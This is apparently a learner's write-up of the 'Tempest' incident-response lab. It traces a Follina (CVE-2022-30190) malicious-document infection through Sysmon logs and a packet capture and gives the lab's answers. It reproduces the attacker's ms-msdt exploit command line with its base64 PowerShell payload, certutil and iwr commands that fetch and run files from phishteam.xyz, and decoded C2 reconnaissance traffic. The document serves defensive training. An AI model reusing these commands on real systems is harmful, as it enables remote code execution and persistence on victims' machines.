You are tasked to conduct an investigation from a workstation affected by a full attack chain.
Introduction
Start Machine
This room aims to introduce the process of analysing endpoint and network logs from a compromised asset. Given the artefacts, we will aim to uncover the incident from the Tempest machine. In this scenario, you will be tasked to be one of the Incident Responders that will focus on handling and analysing the captured artefacts of a compromised machine.
Prerequisites
Before we start, this room requires basic knowledge of endpoint and network security analysis. It is highly recommended to go through the following rooms before attempting this challenge.
Investigation Environment
For this incident, we have provided a Windows machine at your disposal. You may deploy the machine by clicking the Start Machine button in the upper-right-hand corner of the task.
Note: The machine takes a minute to initialise. You may start accessing it once the IP address has been provided.
The machine will start in a split-screen view. In case the VM is not visible, use the blue Show Split View button at the top-right of the page.
Lastly, you may use the following information if you prefer accessing the machine via RDP:
I have successfully connected to the Virtual Machine.
Completed
Preparation - Log Analysis
Before we proceed, let's have a quick refresher regarding these topics, which may help build a methodology for analysing captured events:
Log Analysis
Event Correlation
Log Analysis
Log analysis is the process of understanding events generated by a computer to identify anomalies such as security threats, application bugs, system performance, or other risks that may impact the organisation.
A log file is an audit trail of events or activities within the applications and systems of an organisation. Logs automatically audit any activity configured, such as system messages, authentication attempts, and network traffic generated. In addition, every log entry is audited with a timestamp of when the event occurred, which deeply aids in an investigation.
Event Correlation
Event correlation identifies significant relationships from multiple log sources, such as application logs, endpoint logs, and network logs.
Event correlation deals with identifying significant artefacts co-existing from different log sources and connecting each related artefact. For example, a network connection log may exist in various log sources, such as Sysmon logs (Event ID 3: Network Connection) and Firewall logs. Firewall logs may provide the source and destination IP, source and destination port, protocol, and the action taken. In contrast, Sysmon logs may give the process that invoked the network connection and the user running the process.
With this information, we can connect the dots of each artefact from the two data sources:
Source and Destination IP
Source and Destination Port
Action Taken
Protocol
Process name
User Account
Machine Name
Event correlation can build the puzzle pieces to complete the exact scenario from an investigation.
Answer the questions below
I have read and understood the concept of Log Analysis and Event Correlation.
Completed
Preparation - Tools and Artifacts
In this task, we will prepare the artefacts and introduce the tools needed for the investigation.
Compare by hash
Before conducting the investigation, one of the most important steps is to compare the artefacts by their hashes. It is a common practice to verify if the artefacts are expected as it is.
You can get the hashes of each artefact by running Powershell from the taskbar and executing the following commands:
powershell.exe
PS C:\Users\user> cd '.\Desktop\Incident Files\'
powershell.exe
PS C:\Users\user\Desktop\Incident Files> ls
Directory: C:\Users\user\Desktop\Incident Files
Mode LastWriteTime Length Name
–––– ––––––––––––– –––––– ––––
–a–––– 6/21/2022 1:46 AM 17479060 capture.pcapng
–a–––– 6/21/2022 1:30 AM 3215360 sysmon.evtx
–a–––– 6/21/2022 1:29 AM 1118208 windows.evtx
The toolset needed for this task is focused on analysing Sysmon Logs, Windows Event Logs, and Packet Capture.
Endpoint Logs
To analyse Windows artefacts such as Windows Event Logs and Sysmon logs, we will use the following tools:
EvtxEcmd
Timeline Explorer
SysmonView
Event Viewer
Network Logs
To analyse the provided packet capture, we will use the following tools:
Wireshark
Brim
Note: You can access the tools listed above via the taskbar.
Since some of the tools listed above such as Wireshark, Brim, Event Viewer are already covered by the prerequisite rooms, we will only cover the new ones in this section. 
EvtxEcmd & Timeline Explorer
EvtxEcmd is a command-line tool which parses Windows Event Logs into different formats such as CSV, JSON, XML, etc. You may use this tool in conjunction with Timeline Explorer, created by the same author. Timeline Explorer is a GUI-based tool that functions as a data filtering and navigating application to ease incident responders in handling raw data.
To parse the provided logs, we need first to convert the EVTX logs into CSV using EvtxEcmd and then feed it into Timeline Explorer.
For TimelineExplorer.exe, we can load the exported CSV file by doing the following: File > Open > Choose sysmon.csv from C:\Users\user\Desktop\Incident Files directory
Once the logs are loaded, you may navigate through each column and use the input field to filter specific logs via a unique string.
Lastly, you may use the search feature in the upper right-hand corner to find a unique string that may exist on any column.
SysmonView
SysmonView is a Windows GUI-based tool that visualises Sysmon Logs.
Before using this tool, we must export the log file's contents into XML via Event Viewer.
The machine will notify you once the file has been successfully exported.
Usage:
Go to File > Import Sysmon Event Logs then choose the XML files generated using the Event Viewer.
Once loaded, the left sidebar has search functionality that can filter a specific process in mind.
Choose the image path and session GUID to render the mapped view.
This tool can easily view the correlated events from a specific process. The example above summarises all Sysmon events related to explorer.exe.
Answer the questions below
PS C:\Users\user\Desktop\Incident Files> Get-FileHash -Algorithm SHA256 *
Algorithm Hash Path
--------- ---- ----
SHA256 CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6 C:\Users\user\Desktop\Incident Files\capture.pcapng
SHA256 665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F C:\Users\user\Desktop\Incident Files\sysmon.evtx
SHA256 D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60 C:\Users\user\Desktop\Incident Files\windows.evtx
using tools from Eric
PS C:\Users\user\Desktop\Incident Files> cd 'C:\Tools\EvtxECmd'
PS C:\Tools\EvtxECmd> .\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv
Required argument missing for option: '--csv'.
Description:
EvtxECmd version 1.0.0.0
Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/evtx
Examples: EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out" --csvf MyOutputFile.csv
EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out"
EvtxECmd.exe -f "C:\Temp\Application.evtx" --json "c:\temp\jsonout"
Short options (single letter) are prefixed with a single dash. Long commands are prefixed with two dashes
Usage:
EvtxECmd [options]
Options:
-f <f> File to process. This or -d is required
-d <d> Directory to process that contains evtx files. This or -f is required
--csv <csv> Directory to save CSV formatted results to
--csvf <csvf> File name to save CSV formatted results to. When present, overrides default name
--json <json> Directory to save JSON formatted results to
--jsonf <jsonf> File name to save JSON formatted results to. When present, overrides default name
--xml <xml> Directory to save XML formatted results to
--xmlf <xmlf> File name to save XML formatted results to. When present, overrides default name
--dt <dt> The custom date/time format to use when displaying time stamps [default: yyyy-MM-dd HH:mm:ss.fffffff]
--inc <inc> List of Event IDs to process. All others are ignored. Overrides --exc Format is 4624,4625,5410
--exc <exc> List of Event IDs to IGNORE. All others are included. Format is 4624,4625,5410
--sd <sd> Start date for including events (UTC). Anything OLDER than this is dropped. Format should match --dt
--ed <ed> End date for including events (UTC). Anything NEWER than this is dropped. Format should match --dt
--fj When true, export all available data when using --json [default: False]
--tdt <tdt> The number of seconds to use for time discrepancy detection [default: 1]
--met When true, show metrics about processed event log [default: True]
--maps <maps> The path where event maps are located. Defaults to 'Maps' folder where program was executed
[default: C:\Tools\EvtxECmd\Maps]
--vss Process all Volume Shadow Copies that exist on drive specified by -f or -d [default: False]
--dedupe Deduplicate -f or -d & VSCs based on SHA-1. First file found wins [default: True]
--sync If true, the latest maps from https://github.com/EricZimmerman/evtx/tree/master/evtx/Maps are
downloaded and local maps updated [default: False]
--debug Show debug information during processing [default: False]
--trace Show trace information during processing [default: False]
--version Show version information
-?, -h, --help Show help and usage information
PS C:\Tools\EvtxECmd> .\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv 'C:\Users\user\Desktop\Incident Files' --csvf sysmon.csv
EvtxECmd version 1.0.0.0
Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/evtx
Command line: -f C:\Users\user\Desktop\Incident Files\sysmon.evtx --csv C:\Users\user\Desktop\Incident Files --csvf sysmon.csv
Warning: Administrator privileges not found!
CSV output will be saved to C:\Users\user\Desktop\Incident Files\sysmon.csv
Maps loaded: 383
Processing C:\Users\user\Desktop\Incident Files\sysmon.evtx...
Chunk count: 42, Iterating records...
Event log details
Flags: None
Chunk count: 42
Stored/Calculated CRC: EAFDE57A/EAFDE57A
Earliest timestamp: 1601-01-01 00:00:00.0000000
Latest timestamp: 2022-06-20 17:30:35.3630890
Total event log records found: 2,559
Records included: 2,559 Errors: 0 Events dropped: 0
Metrics (including dropped events)
Event ID Count
1 238
2 2
3 92
5 3
8 3
11 1,024
12 186
13 869
15 6
22 136
Processed 1 file in 7.3504 seconds
Now can proccess with TimelineExplorer.exe
Computer TEMPEST
Now using SysmonView
we must export the log file's contents into XML via Event Viewer
wait till get a msg successfully
What is the SHA256 hash of the capture.pcapng file?
In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.
As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:
The malicious document has a .doc extension.
The user downloaded the malicious document via chrome.exe.
The malicious document then executed a chain of commands to attain code execution.
Investigation Guide
To aid with the investigation, you may refer to the cheatsheet crafted by the team applicable to this scenario:
Start with the events generated by Sysmon.
EvtxEcmd, Timeline Explorer, and SysmonView can interpret Sysmon logs.
Follow the child processes of WinWord.exe.
Use filters such as ParentProcessID or ProcessID to correlate the relationship of each process.
We can focus on Sysmon events such as Process Creation (Event ID 1) and DNS Queries (Event ID 22) to correlate the activity generated by the malicious document.
Significant Data Sources:
Sysmon
Answer the questions below
Using TimeLine Explorer
search WinWord.exe
{"EventData":{"Data":[{"@Name":"RuleName","#text":"Downloads"},{"@Name":"UtcTime","#text":"2022-06-20 17:13:14.228"},{"@Name":"ProcessGuid","#text":"4bbef3ae-aaa8-62b0-2e0a-000000000700"},{"@Name":"ProcessId","#text":"496"},{"@Name":"Image","#text":"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE"},{"@Name":"TargetFilename","#text":"C:\\Users\\benimaru\\Downloads\\~$ee_magicules.doc"},{"@Name":"CreationUtcTime","#text":"2022-06-20 17:13:14.228"},{"@Name":"User","#text":"TEMPEST\\benimaru"}]}}
DestinationIp: 167.71.199.191
QueryName: phishteam.xyz
There's an easy way just searching base64 :)
C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
Look ms-msdt
┌──(witty㉿kali)-[~/Downloads]
└─$ echo "JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==" | base64 -d
$app=[Environment]::GetFolderPath('ApplicationData');cd "$app\Microsoft\Windows\Start Menu\Programs\Startup"; iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip; Expand-Archive .\update.zip -DestinationPath .; rm update.zip;
https://superuser.com/questions/1727392/follina-msdt-vuln-cve-2022-30190-who-is-executing-the-powershell-cvommand
https://wazuh.com/blog/detecting-follina-cve-2022-30190-attack-with-wazuh/
Follina
The user of this machine was compromised by a malicious document. What is the file name of the document?
ee_magicules.doc
What is the name of the compromised user and machine?
Format: username-machine name
benimaru-TEMPEST
What is the PID of the Microsoft Word process that opened the malicious document?
496
Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?
167.71.199.191
What is the base64 encoded string in the malicious payload executed by the document?
What is the CVE number of the exploit used by the attacker to achieve a remote code execution?
External research needed. Observe the parent-child relationship of Winword.exe and the process that executed the malicious base64 payload.
Format: XXXX-XXXXX
2022-30190
Initial Access - Stage 2 execution
Malicious Document - Stage 2
Based on the initial findings, we discovered that there is a stage 2 execution:
The document has successfully executed an encoded base64 command.
Decoding this string reveals the exact command chain executed by the malicious document.
Investigation Guide
With the following discoveries, we may refer again to the cheatsheet to continue with the investigation:
The Autostart execution reflects explorer.exe as its parent process ID.
Child processes of explorer.exe within the event timeframe could be significant.
Process Creation (Event ID 1) and File Creation (Event ID 11) succeeding the document execution are worth checking.
Significant Data Sources:
Sysmon
Answer the questions below
appdata environment variable
The default value of the environment variable APPDATA is **C:\Users\username\AppData\Roaming**.
C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
search explorer.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe
filter by event id 1 then search first.exe
"C:\Users\Public\Downloads\first.exe"
MD5=C9AA36F483B61CFA9758C44ACDB776AC,SHA256=CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2
unfilter event id 1 then search first.exe
QueryName: resolvecyber.xyz
now we need to know wich port use it
using brim & wireshark
upload capture.pcapng
Queries HTTP requests
_path=="http" | cut id.orig_h, id.resp_h, id.resp_p, method, host, uri | uniq -c
and filter by
_path=="http" "resolvecyber.xyz" | cut id.orig_h, id.resp_h, id.resp_p, method, host, uri | uniq -c
there are 2 ports 8080 and 80
resolvecyber.xyz:80
The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?
The AppData environment variable can be simplified.
The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?
Format: domain:port
resolvecyber.xyz:80
Initial Access - Malicious Document Traffic
Malicious Document Traffic
Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:
We discovered the Domain and IP invoked by the malicious document on Sysmon logs.
There is another domain and IP used by the stage 2 payload logged from the same data source.
Investigation Guide
Since we have discovered network-related artefacts, we may again refer to our cheatsheet, which focuses on Network Log Analysis:
We can now use Brim and Wireshark to investigate the packet capture.
Find network events related to the harvested domains and IP addresses.
Sample Brim filter that you can use for this investigation: _path=="http" "<malicious domain>"
Data Sources:
Packet Capture
Answer the questions below
/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
from base64
pwd -
Path
----
C:\Windows\system32
_path=="http" "phishteam.xyz" | sort ts
host
phishteam.xyz
uri
/02dcf07/index.html
http://phishteam.xyz/02dcf07/index.html
_path=="http" "resolvecyber.xyz"
?q=
method
GET
host
resolvecyber.xyz
uri
/9ab62b5?q=bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYX
Nim httpclient/1.6.6
What is the URL of the malicious payload embedded in the document?
*http://phishteam.xyz/02dcf07/index.html*
What is the encoding used by the attacker on the c2 connection?
base64
The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?
q
The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?
/9ab62b5
What is the HTTP method used by the binary?
GET
Based on the user agent, what programming language was used by the attacker to compile the binary?
Format: Answer in lowercase
Nim
Discovery - Internal Reconnaissance
Internal Reconnaissance
Based on the collected findings, we have discovered that the malicious binary continuously uses the C2 traffic:
We can easily decode the encoded string in the network traffic.
The traffic contains the command and output executed by the attacker.
Investigation Guide
To continue with the investigation, we may focus on the following information:
Find network and process events connecting to the malicious domain.
Find network events that contain an encoded command.
We can use Brim to filter all packets containing the encoded string.
Look for endpoint enumeration commands since the attacker is already inside the machine.
In addition, we may refer to our cheatsheet for Brim to quickly investigate the encoded traffic with the following filters:
To get all HTTP requests related to the malicious C2 traffic: _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts
Significant Data Sources:
Packet Capture
Sysmon
Answer the questions below
_path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts
d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K
whoami - tempest\benimaru
cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
pwd -
Path
----
C:\Windows\system32
ZGlyIEM6XFVzZXJzIC0gDQoNCiAgICBEaXJlY3Rvcnk6IEM6XFVzZXJzDQoNCg0KTW9kZSAgICAgICAgICAgICAgICBMYXN0V3JpdGVUaW1lICAgICAgICAgTGVuZ3RoIE5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgIC0tLS0tLS0tLS0tLS0gICAgICAgICAtLS0tLS0gLS0tLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtLS0tLSAgICAgICAgNi8yMC8yMDIyICAgOTowNiBQTSAgICAgICAgICAgICAgICBiZW5pbWFydSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIwLzIwMjIgICA0OjAzIFBNICAgICAgICAgICAgICAgIFB1YmxpYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkLS0tLS0gICAgICAgIDYvMjAvMjAyMiAgMTE6NTIgUE0gICAgICAgICAgICAgICAgcmltdXJ1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCg0KDQo=
dir C:\Users -
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/20/2022 9:06 PM benimaru
d-r--- 6/20/2022 4:03 PM Public
d----- 6/20/2022 11:52 PM rimuru
bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXFRFTVBFU1QNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KQWRtaW5pc3RyYXRvciAgICAgICAgICAgIGJlbmltYXJ1ICAgICAgICAgICAgICAgICBEZWZhdWx0QWNjb3VudCAgICAgICAgICAgDQpHdWVzdCAgICAgICAgICAgICAgICAgICAgcmltdXJ1ICAgICAgICAgICAgICAgICAgIFdEQUdVdGlsaXR5QWNjb3VudCAgICAgICANClRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==
net users -
User accounts for \\TEMPEST
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed successfully.
bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgLSBBbGlhcyBuYW1lICAgICBhZG1pbmlzdHJhdG9ycw0KQ29tbWVudCAgICAgICAgQWRtaW5pc3RyYXRvcnMgaGF2ZSBjb21wbGV0ZSBhbmQgdW5yZXN0cmljdGVkIGFjY2VzcyB0byB0aGUgY29tcHV0ZXIvZG9tYWluDQoNCk1lbWJlcnMNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KQWRtaW5pc3RyYXRvcg0KcmltdXJ1DQpUaGUgY29tbWFuZCBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5Lg0KDQo=
net localgroup administrators - Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.
bmV0IHVzZXIgYmVuaW1hcnUgLSBVc2VyIG5hbWUgICAgICAgICAgICAgICAgICAgIGJlbmltYXJ1DQpGdWxsIE5hbWUgICAgICAgICAgICAgICAgICAgIA0KQ29tbWVudCAgICAgICAgICAgICAgICAgICAgICANClVzZXIncyBjb21tZW50ICAgICAgICAgICAgICAgDQpDb3VudHJ5L3JlZ2lvbiBjb2RlICAgICAgICAgIDAwMCAoU3lzdGVtIERlZmF1bHQpDQpBY2NvdW50IGFjdGl2ZSAgICAgICAgICAgICAgIFllcw0KQWNjb3VudCBleHBpcmVzICAgICAgICAgICAgICBOZXZlcg0KDQpQYXNzd29yZCBsYXN0IHNldCAgICAgICAgICAgIDYvMjAvMjAyMiA5OjE4OjA0IFBNDQpQYXNzd29yZCBleHBpcmVzICAgICAgICAgICAgIE5ldmVyDQpQYXNzd29yZCBjaGFuZ2VhYmxlICAgICAgICAgIDYvMjAvMjAyMiA5OjE4OjA0IFBNDQpQYXNzd29yZCByZXF1aXJlZCAgICAgICAgICAgIE5vDQpVc2VyIG1heSBjaGFuZ2UgcGFzc3dvcmQgICAgIFllcw0KDQpXb3Jrc3RhdGlvbnMgYWxsb3dlZCAgICAgICAgIEFsbA0KTG9nb24gc2NyaXB0ICAgICAgICAgICAgICAgICANClVzZXIgcHJvZmlsZSAgICAgICAgICAgICAgICAgDQpIb21lIGRpcmVjdG9yeSAgICAgICAgICAgICAgIA0KTGFzdCBsb2dvbiAgICAgICAgICAgICAgICAgICA2LzIxLzIwMjIgMToxNDo0OSBBTQ0KDQpMb2dvbiBob3VycyBhbGxvd2VkICAgICAgICAgIEFsbA0KDQpMb2NhbCBHcm91cCBNZW1iZXJzaGlwcyAgICAgICpSZW1vdGUgTWFuYWdlbWVudCBVc2UqVXNlcnMgICAgICAgICAgICAgICAgDQpHbG9iYWwgR3JvdXAgbWVtYmVyc2hpcHMgICAgICpOb25lICAgICAgICAgICAgICAgICANClRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==
net user benimaru - User name benimaru
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2022 9:18:04 PM
Password expires Never
Password changeable 6/20/2022 9:18:04 PM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/21/2022 1:14:49 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
ZGlyIEM6XFVzZXJzXGJlbmltYXJ1IC0gDQoNCiAgICBEaXJlY3Rvcnk6IEM6XFVzZXJzXGJlbmltYXJ1DQoNCg0KTW9kZSAgICAgICAgICAgICAgICBMYXN0V3JpdGVUaW1lICAgICAgICAgTGVuZ3RoIE5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgIC0tLS0tLS0tLS0tLS0gICAgICAgICAtLS0tLS0gLS0tLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgNDoxMyBQTSAgICAgICAgICAgICAgICAzRCBPYmplY3RzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIwLzIwMjIgICA0OjEzIFBNICAgICAgICAgICAgICAgIENvbnRhY3RzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkLXItLS0gICAgICAgIDYvMjEvMjAyMiAgMTI6MjcgQU0gICAgICAgICAgICAgICAgRGVza3RvcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgOToyMCBQTSAgICAgICAgICAgICAgICBEb2N1bWVudHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIxLzIwMjIgICAxOjEzIEFNICAgICAgICAgICAgICAgIERvd25sb2FkcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkLXItLS0gICAgICAgIDYvMjAvMjAyMiAgIDQ6MTMgUE0gICAgICAgICAgICAgICAgRmF2b3JpdGVzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgNDoxMyBQTSAgICAgICAgICAgICAgICBMaW5rcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIwLzIwMjIgICA0OjEzIFBNICAgICAgICAgICAgICAgIE11c2ljICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkYXItLS0gICAgICAgIDYvMjEvMjAyMiAgIDE6MTUgQU0gICAgICAgICAgICAgICAgT25lRHJpdmUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgNDoxMyBQTSAgICAgICAgICAgICAgICBQaWN0dXJlcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIwLzIwMjIgICA0OjEzIFBNICAgICAgICAgICAgICAgIFNhdmVkIEdhbWVzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkLXItLS0gICAgICAgIDYvMjAvMjAyMiAgIDQ6MTMgUE0gICAgICAgICAgICAgICAgU2VhcmNoZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgNTo1NyBQTSAgICAgICAgICAgICAgICBWaWRlb3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQoNCg==
dir C:\Users\benimaru -
Directory: C:\Users\benimaru
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 6/20/2022 4:13 PM 3D Objects
d-r--- 6/20/2022 4:13 PM Contacts
d-r--- 6/21/2022 12:27 AM Desktop
d-r--- 6/20/2022 9:20 PM Documents
d-r--- 6/21/2022 1:13 AM Downloads
d-r--- 6/20/2022 4:13 PM Favorites
d-r--- 6/20/2022 4:13 PM Links
d-r--- 6/20/2022 4:13 PM Music
dar--- 6/21/2022 1:15 AM OneDrive
d-r--- 6/20/2022 4:13 PM Pictures
d-r--- 6/20/2022 4:13 PM Saved Games
d-r--- 6/20/2022 4:13 PM Searches
d-r--- 6/20/2022 5:57 PM Videos
ZGlyIEM6XFVzZXJzXGJlbmltYXJ1XGRvY3VtZW50cyAtIA==
dir C:\Users\benimaru\documents -
ZGlyIEM6XHVzZXJzXGJlbmltYXJ1XERlc2t0b3AgLSANCg0KICAgIERpcmVjdG9yeTogQzpcdXNlcnNcYmVuaW1hcnVcRGVza3RvcA0KDQoNCk1vZGUgICAgICAgICAgICAgICAgTGFzdFdyaXRlVGltZSAgICAgICAgIExlbmd0aCBOYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KLS0tLSAgICAgICAgICAgICAgICAtLS0tLS0tLS0tLS0tICAgICAgICAgLS0tLS0tIC0tLS0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQotYS0tLS0gICAgICAgIDYvMjAvMjAyMiAgMTE6MzQgUE0gICAgICAgICAgICAyNjggYXV0b21hdGlvbi5wczEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCi1hLS0tLSAgICAgICAgNi8yMC8yMDIyICAgNDoxMyBQTSAgICAgICAgICAgMTQ0NiBNaWNyb3NvZnQgRWRnZS5sbmsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQoNCg==
dir C:\users\benimaru\Desktop -
Directory: C:\users\benimaru\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/20/2022 11:34 PM 268 automation.ps1
-a---- 6/20/2022 4:13 PM 1446 Microsoft Edge.lnk
